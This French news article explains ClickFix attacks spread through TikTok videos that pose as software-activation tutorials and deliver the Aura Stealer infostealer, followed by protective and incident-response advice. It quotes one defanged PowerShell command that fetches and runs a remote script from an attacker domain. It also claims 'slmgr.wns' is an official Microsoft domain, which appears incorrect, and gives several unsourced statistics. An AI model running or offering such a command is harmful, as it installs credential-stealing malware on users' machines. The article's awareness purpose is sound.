Attaques ClickFix sur TikTok : Comment les cybercriminels utilisent les vidéos pour propager des infostealers

Théophane Villedieu

Attaques ClickFix sur TikTok : Comment les cybercriminels exploitent les vidéos pour propager des infostealers

En 2025, les plateformes de réseaux sociaux continuent d’être des terrains de chasse privilégiés pour les cybercriminels. Une campagne particulièrement inquiétante utilise des vidéos TikTok apparemment innocentes pour diffuser des logiciels malveillants capables de dérober vos informations sensibles. Ces attaques ClickFix, de plus en plus sophistiquées, représentent une menace sérieuse pour les particuliers comme pour les entreprises. Selon les analystes de cybersécurité, ce type d’attaque a augmenté de plus de 60% au cours des six derniers mois, démontrant l’évolution constante des tactiques d’ingénierie sociale.

Comprendre les attaques ClickFix : mécanismes et dangers

Les attaques ClickFix constituent une méthode d’ingénierie sociale particulièrement insidieuse exploitant la confiance des utilisateurs envers les instructions techniques apparemment légitimes. Dans le contexte actuel, ces attaques se sont adaptées aux habitudes de consommation de contenu numérique, utilisant des plateformes comme TikTok pour cibler un large public.

Le fonctionnement des attaques ClickFix

Une attaque ClickFix typique se déroule en plusieurs étapes méticuleusement orchestrées par les attaquants. Tout d’abord, une vidéo est publiée sur TikTok, présentée comme un tutoriel d’activation pour un logiciel populaire. La vidéo affiche une commande courte et apparemment simple, souvent une ligne de code PowerShell, que l’utilisateur est invité à exécuter en tant qu’administrateur.

Par exemple, une vidéo prétendant activer Photoshop pourrait afficher la commande :

iex (irm slmgr[.]win/photoshop)

Lorsque l’utilisateur exécute cette commande, PowerShell se connecte au site distant indiqué dans l’URL pour récupérer et exécuter un script supplémentaire. Ce script télécharge ensuite des exécutables malveillants, masqués derrière des noms apparemment anodins, qui infectent le système de la victime.

Les cibles privilégiées

Les attaquants choisissent méticuleusement leurs cibles en fonction de leur popularité et de la valeur potentielle des informations accessibles. Parmi les logiciels les plus souvent imités figurent :

  • Microsoft Windows et Microsoft 365
  • Adobe Photoshop et Adobe Premiere
  • CapCut Pro
  • Discord Nitro
  • Des services de streaming comme Netflix
  • Des plateformes de musique comme Spotify Premium

Ces choix ne sont pas accidentels. Chaque logiciel représente un potentiel de vol de données significatif, que ce soit des informations d’identification, des données bancaires ou des accès à des comptes premium payants.

L’évolution de la menace

Selon les spécialistes de la cybersécurité, les attaques ClickFix ont considérablement évolué depuis leur première apparition. Initialement basées sur des techniques simples de phishing, elles ont intégré des éléments d’ingénierie sociale de plus en plus sophistiqués. Les vidéos TikTok actuelles utilisent des effets visuels accrocheurs et un langage adapté à la cible pour renforcer leur crédibilité.

“L’efficacité des attaques ClickFix réside dans leur capacité à exploiter à la fois la curiosité des utilisateurs et leur méconnaissance des risques techniques. La combinaison d’un format de divertissement populaire comme TikTok avec des instructions techniques apparemment légitimes crée un cocktail particulièrement dangereux.”, explique Xavier Mertens, expert en sécurité ISC Handler.

Le cas spécifique des vidéos TikTok : comment elles fonctionnent

L’utilisation de TikTok comme vecteur de distribution de malwares représente une innovation récente particulièrement inquiétante. Cette plateforme, avec son public jeune et souvent moins sensibilisé aux risques de cybersécurité, offre aux attaquants un terrain d’action idéal.

La stratégie des contenus trompeurs

Les vidéos malveillantes sur TikTok suivent un pattern précis conçu pour maximiser leur efficacité. Elles commencent généralement par un accroche visuelle attrayante, montrant l’interface du logiciel prétendument activé. La vidéo se poursuit avec une démonstration rapide de la fonctionnalité “gratuitement” activée, créant un sentiment d’urgence et d’exclusivité.

La partie la plus dangereuse survient à la fin de la vidéo, où l’“astuce” est révélée. Une commande est affichée à l’écran pendant quelques secondes, accompagnée d’instructions verbales ou textuelles précisant qu’elle doit être exécutée en tant qu’administrateur dans PowerShell. Ces instructions sont souvent formulées de manière à minimiser les risques : “C’est sûr, j’utilise ça tous les jours”, “Testé et approuvé”, “Cliquez simplement sur Oui”.

La technique de l’URL trompeuse

Un élément particulièrement subtil de ces attaques est l’utilisation d’URLs qui semblent légitimes mais pointent vers des serveurs malveillants. Dans l’exemple précédent, slmgr[.]win imite le nom de domaine officiel de Microsoft slmgr.wns qui gère les licences Windows. Cette ressemblance est intentionnelle et conçue pour tromper les utilisateurs vigilants.

Selon les analyses menées par les chercheurs en sécurité, ces domaines sont souvent achetés pour des durées limitées, puis abandonnés une fois la campagne terminée. Cette approche “à usage unique” rend le traçage et la fermeture des sites particulièrement difficiles pour les autorités.

Les variants d’Aura Stealer

Le malware distribué par ces attaques est principalement une variante d’Aura Stealer, un infostealer particulièrement dangereux. Une fois exécuté, ce logiciel malveillant effectue plusieurs actions néfastes :

  1. Collecte des identifiants : Récupération des mots de passe enregistrés dans les navigateurs web
  2. Vol des cookies : Capture des sessions actives pour usurper l’identité de l’utilisateur
  3. Accès aux portefeuilles de cryptomonnaie : Recherche et vol des informations de wallets
  4. Exfiltration de données d’applications : Vol des identifiants stockés dans d’autres applications

Ces données sont ensuite transmises aux attaquants via des canaux cryptés, leur donnant un accès complet aux comptes et informations sensibles de la victime.

Les chercheurs ont également identifié un deuxième exécutable, nommé source.exe, qui sert à compiler du code C# directement en mémoire. Cette technique permet au malware d’échapper à certaines détections et de persister sur le système infecté même après des tentatives de suppression.

Les conséquences pour les utilisateurs : vol de données et compromission

Lorsqu’un utilisateur tombe dans le piège d’une attaque ClickFix via TikTok, les conséquences peuvent être désastreuses sur plusieurs plans. Le vol d’informations n’est souvent que le début d’une chaîne d’événements potentiellement dévastateurs pour la victime.

L’impact immédiat : vol d’identifiants et d’informations sensibles

Dès que l’exécutable malveillant est installé, il commence à collecter systématiquement toutes les informations d’identification accessibles sur le système. Cela inclut non seulement les mots de passe enregistrés dans les navigateurs, mais aussi :

  • Les informations de connexion aux réseaux sociaux
  • Les identifiants bancaires et de services financiers
  • Les données d’accès aux comptes professionnels
  • Les informations personnelles stockées localement

Selon une étude récente menée par Picus Security en 2025, près de 46% des environnements testés ont vu leurs mots de passe compromis, soit près du double par rapport à l’année précédente (25%). Cette statistique alarmante démontre l’efficacité croissante des infostealers comme Aura Stealer.

La phase de compromission étendue

Une fois les premières informations volées, les attaquants peuvent utiliser ces données pour accéder à d’autres comptes et services, amplifiant ainsi l’impact initial. Cette phase de compromission secondaire peut inclure :

  • L’accès aux comptes professionnels : Si un compte professionnel est compromis, l’attaquant peut avoir accès aux systèmes internes de l’entreprise auxquels la victime se connectait depuis domicile.
  • Les transactions non autorisées : Avec l’accès aux comptes bancaires et de paiement, les attaquants peuvent effectuer des transactions frauduleuses.
  • L’usurpation d’identité : Les informations personnelles volées peuvent être utilisées pour ouvrir de comptes ou contracter des crédits au nom de la victime.
  • Le chantage : Les attaquants peuvent menacer de divulguer des informations personnelles ou professionnelles sensibles si la victime ne paie pas une rançon.

Les risques pour les entreprises

Lorsqu’un employé tombe dans ce type de piège, l’impact dépasse largement le cadre individuel. Les entreprises exposent des informations propriétaires, des secrets commerciaux et des données clients à des risques graves. Dans certains cas, ces attaques servent de point d’entrée initial pour des campagnes plus larges visant l’infrastructure de l’entreprise.

Le coût moyen d’une fuite de données pour une entreprise en France est estimé à 3,5 millions d’euros, selon le rapport de l’ANSSI 2025. Ce chiffre inclut non seulement les coûts directs de remédiation, mais aussi les amendes potentielles pour non-conformité au RGPD, la perte de confiance des clients et les dommages réputationnels.

Comment se protéger : bonnes pratiques et mesures de sécurité

Face à cette menace croissante, il est essentiel d’adopter des pratiques de sécurité robustes tant au niveau individuel qu’organisationnel. La prévention reste la meilleure défense contre ces attaques ClickFis sophistiquées.

Les mesures de base pour les particuliers

Pour les utilisateurs individuels, plusieurs habitudes simples mais efficaces peuvent considérablement réduire le risque d’être victime de ces attaques :

  1. Ne jamais exécuter de commandes provenant de sources non vérifiées : Qu’il s’agisse de vidéos TikTok, de messages sur les réseaux sociaux ou d’e-mails, toute demande d’exécution d’une commande technique doit être considérée avec méfiance.

  2. Vérifier toujours la légitimité des tutoriels : Avant de suivre des instructions d’activation ou de “crack” de logiciels, il est crucial de vérifier la crédibilité de la source. Les tutoriels officiels des éditeurs de logiciels sont toujours les plus sûrs.

  3. Maintenir ses logiciels à jour : Les mises à jour régulières des systèmes d’exploitation et des applications incluent souvent des correctifs de sécurité qui peuvent bloquer l’exécution de certains malwares.

  4. Utiliser des solutions de sécurité réputées : Un antivirus ou un EDR (Endpoint Detection and Response) à jour peut détecter et bloquer la plupart des infostealers avant qu’ils ne puissent nuire.

  5. Activer le pare-feu : Le pare-feu Windows ou tiers agit comme une barrière supplémentaire contre les communications non autorisées avec des serveurs externes.

Les bonnes pratiques pour les entreprises

Pour les organisations, la protection contre ces menaces nécessite une approche plus structurée :

  • Former les employés : Des sessions de sensibilisation régulières sur les risques de l’ingénierie sociale et les tactiques d’attaque comme ClickFix sont essentielles.
  • Mettre en place des contrôles d’accès stricts : L’utilisation du principe du moindre privilège limite les dommages potentiels en cas d’infection.
  • Déployer des solutions de sécurité avancées : Les EDR, les solutions de sandboxing et les outils de détection de menaces peuvent aider à identifier et bloquer ces attaques.
  • Surveiller le trafic réseau : La détection de communications suspectes vers des domaines inconnus peut révéler une infection potentielle.
  • Établir des protocoles de réponse aux incidents : Une réponse rapide et efficace en cas d’infection peut minimiser les dommages.

Les outils de protection spécifiques

Certaines technologies offrent une protection renforcée contre les attaques ClickFix :

  1. Les solutions de blocage d’exécution : Des outils comme Windows Defender Application Control ou AppLocker peuvent empêcher l’exécution de scripts PowerShell non autorisés.

  2. Les systèmes de détection comportementale : Ces solutions analysent le comportement des applications en temps réel et alertent sur toute activité suspecte.

  3. Les solutions de sécurité cloud : Les services de sécurité cloud modernes analysent les menaces dans un environnement isolé avant de les autoriser à atteindre les terminaux.

  4. Les solutions de gestion des privilèges : Ces outils limitent les droits d’administrateur aux processus qui en ont vraiment besoin.

Que faire si vous êtes victime : étapes de réponse

Malgré toutes les précautions, il est possible de tomber dans le piège d’une attaque ClickFix. Si cela se produit, une réponse rapide et appropriée est essentielle pour minimiser les dommages.

Les premières étapes à suivre

Si vous avez exécuté une commande suspecte depuis une vidéo TikTok ou toute autre source, suivez immédiatement ces étapes :

  1. Déconnectez-vous immédiatement de tous vos comptes : Commencez par les comptes les plus critiques (banque, e-mail principal, etc.) depuis un appareil non infecté.

  2. Changez tous vos mots de passe : Utilisez un appareil de confiance pour changer les mots de passe de tous vos comptes importants. Commencez par les comptes bancaires et financiers.

  3. Activez l’authentification forte : Si disponible, activez l’authentification à deux facteurs sur tous vos comptes sensibles.

  4. Scannez votre système avec un antivirus réputé : Utilisez un antivirus à jour pour détecter et supprimer les malwares potentiels.

  5. Consultez un expert en sécurité : Si l’infection semble sérieuse, faites appel à un professionnel pour une analyse approfondie.

La communication avec les parties prenantes

Si l’infection a compromis des informations professionnelles ou sensibles, il est crucial de communiquer de manière proactive :

  • Avertissez votre service informatique : Ils peuvent aider à contenir la propagation de l’infection dans le réseau.
  • Informez les clients concernés : Si des données clients ont été compromises, une communication rapide est nécessaire pour respecter les obligations légales.
  • Contactez les autorités compétentes : En France, le signalement auprès de l’ANSSI ou de la CNIL est obligatoire en cas de fuite de données massives.

La récupération et la remédiation

Une fois l’infection contenue, plusieurs étapes sont nécessaires pour remédier complètement à la situation :

  1. Effectuer une restauration système : Si possible, restaurez votre système à un point antérieur à l’infection.

  2. Réinstaller les applications critiques: Certains malwares peuvent avoir compromis des applications entières. Une réinstallation propre est parfois nécessaire.

  3. Surveiller les activités suspectes : Soyez particulièrement vigilant concernant les tentatives d’accès non autorisés à vos comptes dans les semaines suivant l’incident.

  4. Revoir vos pratiques de sécurité : Utilisez cette expérience comme une opportunité d’améliorer vos habitudes de sécurité et de sensibilisation.

Conclusion et vigilance nécessaire

Les attaques ClickFix diffusées via TikTok représentent une évolution préoccupante de la menace des infostealers. En exploitant la popularité de cette plateforme et la confiance des utilisateurs dans les tutoriels techniques, les cybercriminels ont développé une méthode de distribution particulièrement efficace et difficile à contrer.

La protection contre ces menaces repose sur une combinaison de vigilance constante, d’éducation aux risques et d’adoption de bonnes pratiques de sécurité. Il est crucial de se rappeler que toute commande exécutée sur un système informatique doit provenir d’une source absolument fiable, et que les “astuces” pour obtenir un accès gratuit aux logiciels payants sont presque toujours des tentatives d’arnaque.

Dans un paysage numérique en constante évolution, où les plateformes de médias sociaux deviennent des vecteurs d’attaque de plus en plus sophistiqués, la vigilance reste la meilleure défense. En adoptant une approche proactive de la sécurité et en restant informé des dernières menaces, les utilisateurs peuvent se protéger efficacement contre ces attaques ClickFix sur TikTok et préserver la sécurité de leurs informations personnelles et professionnelles.

La cybersécurité n’est pas seulement une question de technologie, mais avant tout une question de conscience et de comportement. En comprenant les tactiques des attaquants et en adoptant les bonnes pratiques, chacun peut contribuer à rendre l’environnement numérique plus sûr pour tous.